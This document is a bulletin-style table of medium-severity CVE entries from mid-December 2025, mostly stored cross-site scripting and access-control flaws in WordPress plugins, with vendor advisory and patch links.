| techjewel--FluentAuth The Ultimate Authorization & Security Plugin for WordPress | The FluentAuth - The Ultimate Authorization & Security Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `fluent_auth_reset_password` shortcode in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13728 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a3187d3e-e1da-4af7-a1fa-9657389f9e22?source=cve https://plugins.trac.wordpress.org/changeset/3409232/fluent-security/tags/2.1.0/app/Hooks/Handlers/CustomAuthHandler.php |
| daggerhart--OpenID Connect Generic Client | The OpenID Connect Generic Client plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'openid_connect_generic_auth_url' shortcode in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-18 | 6.4 | CVE-2025-13730 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe5fd453-b1fc-4d52-bb46-aebd68508891?source=cve https://plugins.trac.wordpress.org/browser/daggerhart-openid-connect-generic/trunk/openid-connect-generic.php#L168 https://plugins.trac.wordpress.org/browser/daggerhart-openid-connect-generic/trunk/includes/openid-connect-generic-client-wrapper.php#L241 https://plugins.trac.wordpress.org/changeset/3418927 |
| someguy9--Lightweight Accordion | The Lightweight Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `lightweight-accordion` shortcode in all versions up to, and including, 1.5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-13740 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f117f713-e2f1-4803-87f7-14b1576d823b?source=cve https://plugins.trac.wordpress.org/changeset/3413649/ |
| htplugins--WishSuite Wishlist for WooCommerce | The WishSuite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button_text' parameter of the 'wishsuite_button' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-21 | 6.4 | CVE-2025-13838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e1cd584-ffb8-43d6-a7b6-141c59ac463d?source=cve https://plugins.trac.wordpress.org/browser/wishsuite/trunk/includes/templates/wishsuite-button-add.php#L1 https://plugins.trac.wordpress.org/browser/wishsuite/tags/1.5.1/includes/templates/wishsuite-button-add.php#L1 https://plugins.trac.wordpress.org/changeset/3419202/ |
| linksoftware--HTML Forms Simple WordPress Forms Plugin | The HTML Forms - Simple WordPress Forms Plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in all versions up to and including 1.6.0 due to insufficient sanitization of fabricated file upload field metadata before displaying it in the WordPress admin dashboard. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute whenever an administrator accesses the form submissions page. | 2025-12-17 | 6.1 | CVE-2025-13861 | https://www.wordfence.com/threat-intel/vulnerabilities/id/52e2f1b9-d240-4813-9124-51bd6b047553?source=cve https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L321 https://plugins.trac.wordpress.org/browser/html-forms/trunk/src/functions.php#L357 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419926%40html-forms%2Ftrunk&old=3407043%40html-forms%2Ftrunk&sfp_email=&sfph_mail= |
| adreastrian--WP Social Ninja Embed Social Feeds, User Reviews & Chat Widgets | The WP Social Ninja - Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the getAdvanceSettings and saveAdvanceSettings functions in all versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to view and modify plugin's advanced settings. | 2025-12-17 | 6.5 | CVE-2025-13880 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8b8e3cb9-00b3-4500-adf0-c8a9fbf9d546?source=cve https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Routes/api.php#L44 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Policies/SettingsPolicy.php#L14 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Services/PermissionManager.php#L176 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/4.0.1/app/Http/Controllers/SettingsController.php#L144 |
| Inductive Automation--Ignition | The vulnerability affects Ignition SCADA applications where Python scripting is utilized for automation purposes. The vulnerability arises from the absence of proper security controls that restrict which Python libraries can be imported and executed within the scripting environment. The core issue lies in the Ignition service account having system permissions beyond what an Ignition privileged user requires. When an authenticated administrator uploads a malicious project file containing Python scripts with bind shell capabilities, the application executes these scripts with the same privileges as the Ignition Gateway process, which typically runs with SYSTEM-level permissions on Windows. Alternative code execution patterns could lead to similar results. | 2025-12-18 | 6.4 | CVE-2025-13911 | https://security.inductiveautomation.com/ https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-01.json |
| wpdevteam--Essential Addons for Elementor Popular Elementor Templates & Widgets | The Essential Addons for Elementor - Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple attack vectors in all versions up to, and including, 6.5.3. This is due to insufficient input sanitization and output escaping in the Event Calendar widget's custom attributes handling and the Image Masking module's element ID rendering. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-13977 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a0de0b28-fbad-4fcf-a7ab-35c545c19a4a?source=cve https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/assets/front-end/js/view/event-calendar.min.js https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/includes/Extensions/Image_Masking.php#L498 https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/6.5.1/includes/Extensions/Image_Masking.php#L587 https://plugins.trac.wordpress.org/changeset/3419289/essential-addons-for-elementor-lite/trunk/includes/Extensions/Image_Masking.php |
| IBM--UCD - IBM DevOps Deploy | IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 could allow an authenticated user with LLM integration configuration privileges to recover a previously saved LLM API Token. | 2025-12-15 | 6.5 | CVE-2025-14148 | https://www.ibm.com/support/pages/node/7254663 |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'outbound_resource' parameter in the slimtrack AJAX action in all versions up to, and including, 5.3.2. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.1 | CVE-2025-14151 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6ee675dd-5b43-439f-9717-6c531e9bf066?source=cve https://plugins.trac.wordpress.org/browser/wp-slimstat/tags/5.3.2/admin/view/wp-slimstat-reports.php#L1341 https://plugins.trac.wordpress.org/browser/wp-slimstat/tags/5.3.2/admin/view/right-now.php#L273 https://plugins.trac.wordpress.org/changeset/3421814/wp-slimstat/trunk?contextall=1&old=3401545&old_path=%2Fwp-slimstat%2Ftrunk#file4 |
| wordplus--Better Messages Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss | The Better Messages - Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via guest display name in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.1 | CVE-2025-14154 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d68bbf0d-72e9-4295-a1e1-4abeb36cae1b?source=cve https://plugins.trac.wordpress.org/changeset/3420771/bp-better-messages/trunk/inc/guests.php |
| GIGABYTE--intel 600 chipset Motherboard | Certain motherboard models developed by GIGABYTE has a Protection Mechanism Failure vulnerability. Because IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14302 | https://www.twcert.org.tw/tw/cp-132-10574-ddf09-1.html https://www.twcert.org.tw/en/cp-139-10575-e4f41-2.html https://www.gigabyte.com/Support/Security?type=1 |
| MSI--Intel 600 chipset motherboard | Certain motherboard models developed by MSI has a Protection Mechanism Failure vulnerability. Because IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14303 | https://www.twcert.org.tw/tw/cp-132-10576-0a0fd-1.html https://www.twcert.org.tw/en/cp-139-10577-3cd58-2.html https://csr.msi.com/global/product-security-advisories |
| ASRock--Intel 500 chipset motherboard | Certain motherboard models developed by ASRock and its subsidiaries, ASRockRack and ASRockInd. has a Protection Mechanism Failure vulnerability. Because IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded. | 2025-12-17 | 6.8 | CVE-2025-14304 | https://www.twcert.org.tw/tw/cp-132-10578-c43b4-1.html https://www.twcert.org.tw/en/cp-139-10579-9205b-2.html https://www.asrock.com/support/Security.asp https://www.asrockind.com/zh-tw/security-center |
| Proliz Software Ltd.--OBS (Student Affairs Information System)0 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Proliz Software Ltd. OBS (Student Affairs Information System)0 allows Reflected XSS.This issue affects OBS (Student Affairs Information System)0: before 26.5009. | 2025-12-17 | 6.3 | CVE-2025-14347 | https://www.usom.gov.tr/bildirim/tr-25-0463 |
| brechtvds--WP Recipe Maker | The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 10.2.3 due to insufficient input sanitization and output escaping on user-supplied attributes in the wprm-recipe-roundup-item shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-17 | 6.4 | CVE-2025-14385 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6030712-ae4f-4cdb-a500-dff689947ff3?source=cve https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php#L244 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php#L372 https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/shortcodes/recipe/class-wprm-sc-name.php#L83 https://plugins.trac.wordpress.org/changeset/3419784/wp-recipe-maker/trunk/includes/public/class-wprm-recipe-roundup.php |
| thimpress--LearnPress WordPress LMS Plugin | The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-15 | 6.4 | CVE-2025-14387 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f29b3a37-436d-4d03-8818-d5267b23067b?source=cve https://github.com/LearnPress/learnpress/commit/3bdaa63920c7d485e7efa7c92d3f19273a2916ff |
| bookingalgorithms--BA Book Everything | The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's babe-search-form shortcode in all versions up to, and including, 1.8.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-19 | 6.4 | CVE-2025-14449 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2be1fbfc-a809-4a42-9be4-24c8274c1e71?source=cve https://plugins.trac.wordpress.org/changeset/3418011/ba-book-everything |
| fastpi-sso--fastapi-sso | Versions of the package fastapi-sso before 0.19.0 are vulnerable to Cross-site Request Forgery (CSRF) due to the improper validation of the OAuth state parameter during the authentication callback. While the get_login_url method allows for state generation, it does not persist the state or bind it to the user's session. Consequently, the verify_and_process method accepts the state received in the query parameters without verifying it against a trusted local value. This allows a remote attacker to trick a victim into visiting a malicious callback URL, which can result in the attacker's account being linked to the victim's internal account. | 2025-12-19 | 6.3 | CVE-2025-14546 | https://security.snyk.io/vuln/SNYK-PYTHON-FASTAPISSO-14386403 https://github.com/tomasvotava/fastapi-sso/commit/6117d1a5ad498ba57d671e8a059ebe20db5abe02 https://github.com/tomasvotava/fastapi-sso/issues/266 |
| Ugreen--DH2100+ | A vulnerability has been found in Ugreen DH2100+ up to 5.3.0. This affects an unknown function of the component USB Handler. Such manipulation leads to symlink following. The attack can be executed directly on the physical device. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 6.6 | CVE-2025-14693 | VDB-336411 | Ugreen DH2100+ USB symlink VDB-336411 | CTI Indicators (IOB, IOC) Submit #704646 | Ugreen NAS DH2100+ V5.3.0 Incorrect Access Control Submit #704657 | Ugreen Ugreen NAS DH2100+ V5.3.0 Incorrect Access Control (Duplicate) https://www.notion.so/2bc6cf4e528a8083bf3fc6f7a953f0a1 |
| SamuNatsu--HaloBot | A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Executing manipulation of the argument action can lead to dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-15 | 6.3 | CVE-2025-14695 | VDB-336413 | SamuNatsu HaloBot Inter-plugin API index.js html_renderer dynamically-managed code resources VDB-336413 | CTI Indicators (IOB, IOC, IOA) Submit #705587 | SamuNatsu HaloBot 1.0 Improper Control of Dynamically-Managed Code Resources https://github.com/rassec2/dbcve/issues/20 |
| CTCMS--Content Management System | A weakness has been identified in CTCMS Content Management System up to 2.1.2. This affects an unknown function in the library /ctcms/apps/libraries/CT_Parser.php of the component Frontend/Template Management Module. This manipulation causes improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. | 2025-12-15 | 6.3 | CVE-2025-14731 | VDB-336488 | CTCMS Content Management System Frontend/Template Management CT_Parser.php special elements used in a template engine VDB-336488 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707106 | ctcms 2.1.2 Command Injection Submit #707107 | ctcms 2.1.2 Command Injection (Duplicate) https://note-hxlab.wetolink.com/share/Ros8ZIeCLQrN https://note-hxlab.wetolink.com/share/U6cnRoRfn09r |
| Ningyuanda--TC155 | A vulnerability was identified in Ningyuanda TC155 57.0.2.0. This impacts an unknown function of the file /onvif/device_service of the component ONVIF PTZ Control Interface. The manipulation leads to improper access controls. The attack requires being on the local network. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-16 | 6.3 | CVE-2025-14749 | VDB-336522 | Ningyuanda TC155 ONVIF PTZ Control device_service access control VDB-336522 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707198 | Shenzhen Ningyuanda Technology Co., Ltd. TC155 IP Camera Firmware version: 57.0.2.0 Unauthenticated ONVIF PTZ Full Remote Camera Control https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-PTZ-Remote-Control.md |
| ALASCA--YAOOK | Incorrect configuration of replication security in the MariaDB component of the infra-operator in YAOOK Operator allows an on-path attacker to read database contents, potentially including credentials | 2025-12-16 | 6.5 | CVE-2025-14758 | GitLab Issue #631 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An IDOR (Broken Access Control) vulnerability exists in the admin API endpoints for authorization resource management, specifically in ResourceSetService and PermissionTicketService. The system checks authorization against the resourceServer (client) ID provided in the API request, but the backend database lookup and modification operations (findById, delete) only use the resourceId. This mismatch allows an authenticated attacker with fine-grained admin permissions for one client (e.g., Client A) to delete or update resources belonging to another client (Client B) within the same realm by supplying a valid resource ID. | 2025-12-16 | 6 | CVE-2025-14777 | https://access.redhat.com/security/cve/CVE-2025-14777 RHBZ#2422596 |
| Xiongwei--Smart Catering Cloud Platform | A vulnerability was detected in Xiongwei Smart Catering Cloud Platform 2.1.6446.28761. The affected element is an unknown function of the file /dishtrade/dish_trade_detail_get. The manipulation of the argument filter results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. | 2025-12-16 | 6.3 | CVE-2025-14780 | VDB-336607 | Xiongwei Smart Catering Cloud Platform dish_trade_detail_get sql injection VDB-336607 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #674051 | Hangzhou Xiongwei Technology Development Co., Ltd Smart Catering Cloud Platform 2.1.6446.28761 SQL injection https://github.com/zhangbuneng/3/issues/1 |
| code-projects--Simple Stock System | A weakness has been identified in code-projects Simple Stock System 1.0. This affects an unknown function of the file /checkuser.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-17 | 6.3 | CVE-2025-14834 | VDB-336983 | code-projects Simple Stock System checkuser.php sql injection VDB-336983 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715228 | code-projects Simple Stock System In PHP 1.0 SQL Injection https://gist.github.com/b1uel0n3/06593fd15acd0f2f61c29c5595453755 https://code-projects.org/ |
| y_project--RuoYi | A security vulnerability has been detected in y_project RuoYi up to 4.8.1. The affected element is an unknown function of the file /monitor/cache/getnames. Such manipulation of the argument fragment leads to code injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-18 | 6.3 | CVE-2025-14856 | VDB-337047 | y_project RuoYi getnames code injection VDB-337047 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710152 | Ruoyi Management System V4.8.1 Code Injection https://github.com/ltranquility/CVE/issues/26 |
| SourceCodester--Client Database Management System | A flaw has been found in SourceCodester Client Database Management System 1.0. This affects an unknown part of the file /user_leads.php of the component Leads Generation Module. Executing manipulation can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-18 | 6.3 | CVE-2025-14885 | VDB-337373 | SourceCodester Client Database Management System Leads Generation user_leads.php unrestricted upload VDB-337373 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715595 | SourceCodester Client Database Management System 1 Unrestricted Upload https://medium.com/@rvpipalwa/remote-code-execution-rce-vulnerability-report-4394b38ff90e https://www.sourcecodester.com/ |
| JeecgBoot--JeecgBoot | A security flaw has been discovered in JeecgBoot up to 3.9.0. The affected element is an unknown function of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysTenantController.java of the component Multi-Tenant Management Module. Performing manipulation of the argument ID results in improper authentication. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. The patch is named e1c8f00bf2a2e0edddbaa8119afe1dc92d9dc1d2/67795493bdc579e489d3ab12e52a1793c4f8a0ee. It is recommended to apply a patch to fix this issue. | 2025-12-19 | 6.3 | CVE-2025-14908 | VDB-337432 | JeecgBoot Multi-Tenant Management SysTenantController.java improper authentication VDB-337432 | CTI Indicators (IOB, IOC, IOA) Submit #715742 | jeecgboot 3.9.0 bfla https://github.com/jeecgboot/JeecgBoot/issues/9196 https://github.com/jeecgboot/JeecgBoot/commit/e1c8f00bf2a2e0edddbaa8119afe1dc92d9dc1d2 |
| Elastic--Elasticsearch | Improper Authentication in Elasticsearch PKI realm can lead to user impersonation via specially crafted client certificates. A malicious actor would need to have such a crafted client certificate signed by a legitimate, trusted Certificate Authority. | 2025-12-15 | 6.8 | CVE-2025-37731 | https://discuss.elastic.co/t/elasticsearch-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-27/384063 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Asset List functionality due to improper validation of network traffic data. An unauthenticated attacker can send specially crafted network packets to inject HTML tags into asset attributes. When a victim views the affected assets in the Asset List (and similar functions), the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2025-12-18 | 6.1 | CVE-2025-40893 | https://security.nozominetworks.com/NN-2025:14-01 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to SQL injection, which may allow an attacker to execute arbitrary SQL commands. | 2025-12-18 | 6.3 | CVE-2025-46268 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Qualcomm, Inc.--Snapdragon | Information disclosure while exposing internal TA-to-TA communication APIs to HLOS | 2025-12-18 | 6.7 | CVE-2025-47319 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information disclosure while processing system calls with invalid parameters. | 2025-12-18 | 6.5 | CVE-2025-47325 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch. | 2025-12-16 | 6.5 | CVE-2025-59935 | https://github.com/glpi-project/glpi/security/advisories/GHSA-j8vv-9f8m-r7jx |
| BullWall--Server Intrusion Protection | BullWall Server Intrusion Protection has a noticeable delay before the MFA check when connecting via RDP. A remote authenticated attacker with administrative privileges can potentially bypass detection during this window. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 6.2 | CVE-2025-62003 | url url |
| BullWall--Server Intrusion Protection | BullWall Server Intrusion Protection services are initialized after login services. An authenticated attacker with administrative permissions can log in after boot and bypass MFA. SIP service does not retroactively enforce the challenge or disconnect unauthenticated sessions. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 6.2 | CVE-2025-62004 | url url |
| Tormorten--WP Microdata | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tormorten WP Microdata allows Stored XSS.This issue affects WP Microdata: from n/a through 1.0. | 2025-12-21 | 6.5 | CVE-2025-62901 | https://vdp.patchstack.com/database/wordpress/plugin/wp-microdata/vulnerability/wordpress-wp-microdata-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| HappyDevs--TempTool | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HappyDevs TempTool allows Stored XSS.This issue affects TempTool: from n/a through 1.3.1. | 2025-12-21 | 6.5 | CVE-2025-62926 | https://vdp.patchstack.com/database/wordpress/plugin/current-template-name/vulnerability/wordpress-temptool-show-current-template-info-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AmentoTech--Tuturn | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Tuturn allows Path Traversal.This issue affects Tuturn: from n/a before 3.6. | 2025-12-18 | 6.5 | CVE-2025-64235 | https://vdp.patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-arbitrary-file-download-vulnerability?_s_id=cve |
| Crocoblock--JetElements For Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor allows DOM-Based XSS.This issue affects JetElements For Elementor: from n/a through 2.7.12. | 2025-12-18 | 6.5 | CVE-2025-64355 | https://vdp.patchstack.com/database/wordpress/plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.21, an unauthorized user with an API access can read all knowledge base entries. Users should upgrade to 10.0.21 to receive a patch. | 2025-12-16 | 6.5 | CVE-2025-64520 | https://github.com/glpi-project/glpi/security/advisories/GHSA-62p9-prpq-j62q https://github.com/glpi-project/glpi/commit/a3d5cc4a63ae592c0b5592ebe6d562164904dab3 |
| pluginsGLPI--databaseinventory | pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. Prior to version 1.1.2, in certain conditions (database write access must first be obtained through another vulnerability or misconfiguration), user-controlled data is stored insecurely in the database via computergroup, and is later unserialized on every page load, allowing arbitrary PHP object instantiation. Version 1.1.2 fixes the issue. | 2025-12-19 | 6.4 | CVE-2025-65035 | https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-xc3r-32rx-3j4j https://github.com/pluginsGLPI/databaseinventory/commit/08c7055d2c5fc744cb092d7d56a608e359c56f1a https://github.com/pluginsGLPI/databaseinventory/blob/1.1.2/CHANGELOG.md#112---2025-11-25 |
| PickPlugins--Post Grid and Gutenberg Blocks | Missing Authorization vulnerability in PickPlugins Post Grid and Gutenberg Blocks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Grid and Gutenberg Blocks: from n/a through 2.3.17. | 2025-12-18 | 6.5 | CVE-2025-66058 | https://vdp.patchstack.com/database/wordpress/plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-17-broken-access-control-vulnerability-2?_s_id=cve |
| Hikvision--DS-7104HGHI-F1 | There is a privilege escalation vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and gaining access to an unrestricted shell environment. | 2025-12-19 | 6.2 | CVE-2025-66173 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/ |
| Hikvision--DS-7104HGHI-F1 | There is an improper authentication vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and run a series of commands. | 2025-12-19 | 6.5 | CVE-2025-66174 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/ |
| Foxit Software Inc.--webplugins.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in webplugins.foxit.com. A postMessage handler fails to validate the message origin and directly assigns externalPath to a script source, allowing an attacker to execute arbitrary JavaScript when a crafted postMessage is received. | 2025-12-19 | 6.3 | CVE-2025-66500 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Predefined Text feature of the Foxit eSign section. A crafted payload can be stored via the Identity "First Name" field, which is later rendered into the DOM without proper sanitization. As a result, the injected script may execute when predefined text is used or when viewing document properties. | 2025-12-19 | 6.3 | CVE-2025-66501 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Page Templates feature. A crafted payload can be stored as the template name, which is later rendered into the DOM without proper sanitization. As a result, the injected script executes each time the affected PDF is loaded. | 2025-12-19 | 6.3 | CVE-2025-66502 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Layer Import functionality. A crafted payload can be injected into the "Create new Layer" field during layer import and is later rendered into the DOM without proper sanitization. As a result, the injected script executes when the Layers panel is accessed. | 2025-12-19 | 6.3 | CVE-2025-66519 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in the Portfolio feature of the Foxit PDF Editor cloud (pdfonline.foxit.com). User-supplied SVG files are not properly sanitized or validated before being inserted into the HTML structure. As a result, embedded HTML or JavaScript within a crafted SVG may execute whenever the Portfolio file list is rendered. | 2025-12-19 | 6.3 | CVE-2025-66520 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Trusted Certificates feature. A crafted payload can be injected as the certificate name, which is later rendered into the DOM without proper sanitization. As a result, the injected script executes each time the Trusted Certificates view is loaded. | 2025-12-19 | 6.3 | CVE-2025-66521 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in the Digital IDs functionality of the Foxit PDF Editor Cloud (pdfonline.foxit.com). The application does not properly sanitize or encode the Common Name field of Digital IDs before inserting user-supplied content into the DOM. As a result, embedded HTML or JavaScript may execute whenever the Digital IDs dialog is accessed or when the affected PDF is loaded. | 2025-12-19 | 6.3 | CVE-2025-66522 | https://www.foxit.com/support/security-bulletins.html |
